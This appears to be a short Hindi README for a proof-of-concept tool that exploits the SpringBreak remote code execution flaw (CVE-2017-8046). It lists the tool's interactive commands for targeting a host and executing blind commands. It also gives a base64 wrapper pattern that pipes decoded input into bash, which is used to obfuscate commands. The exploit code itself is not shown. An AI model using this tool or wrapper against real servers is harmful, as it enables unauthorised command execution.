
SpringBreak (CVE-2017-8046) के लिए PoC
मुझे हाल ही में सामने आई SpringBreak भेद्यता (CVE-2017-8046) के लिए कई अलग-अलग एंडपॉइंट्स का परीक्षण करने हेतु एक टूल की आवश्यकता थी और मुझे कोई नहीं मिला, इसलिए मैंने इसे झटपट बना दिया।
_______ _______ _______ _________ _ _______ ______ _______ _______ _______ _
( ____ \( ____ )( ____ )\__ __/( ( /|( ____ \( ___ \ ( ____ )( ____ \( ___ )| \ /\
| ( \/| ( )|| ( )| ) ( | \ ( || ( \/| ( ) )| ( )|| ( \/| ( ) || \ / /
| (_____ | (____)|| (____)| | | | \ | || | | (__/ / | (____)|| (__ | (___) || (_/ /
(_____ )| _____)| __) | | | (\ \) || | ____ | __ ( | __)| __) | ___ || _ (
) || ( | (\ ( | | | | \ || | \_ )| ( \ \ | (\ ( | ( | ( ) || ( \ \
/\____) || ) | ) \ \_____) (___| ) \ || (___) || )___) )| ) \ \__| (____/\| ) ( || / \
\_______)|/ |/ \__/\_______/|/ )_)(_______)|/ \___/ |/ \__/(_______/|/ \||_/ \/
PoC for CVE-2017-8046. Available commands:
target <https://host/app/path>
exec <command to execute on target>
base64 <on|off> (Toggles base64 encoding of commands (uses bash), default: on)
verify <on|off> (Toggles SSL verification, default: on)
exit
Note: This is blind RCE, commands executed will not return output.
SpringBreak>
ये स्वतः स्पष्ट होने चाहिए, लेकिन base64 पर विस्तार से बताने के लिए:
base64 डिफ़ॉल्ट रूप से चालू रहता है और यह कमांड्स को base64 में बदलकर उन्हें bash -c {echo,BASE64_COMMAND}|{base64,-d}|{bash,-i} में लपेट देता है। इसे बंद करने पर कच्चे कमांड्स भेजे जाते हैं (बाइट ऐरे में बदलने के बाद)।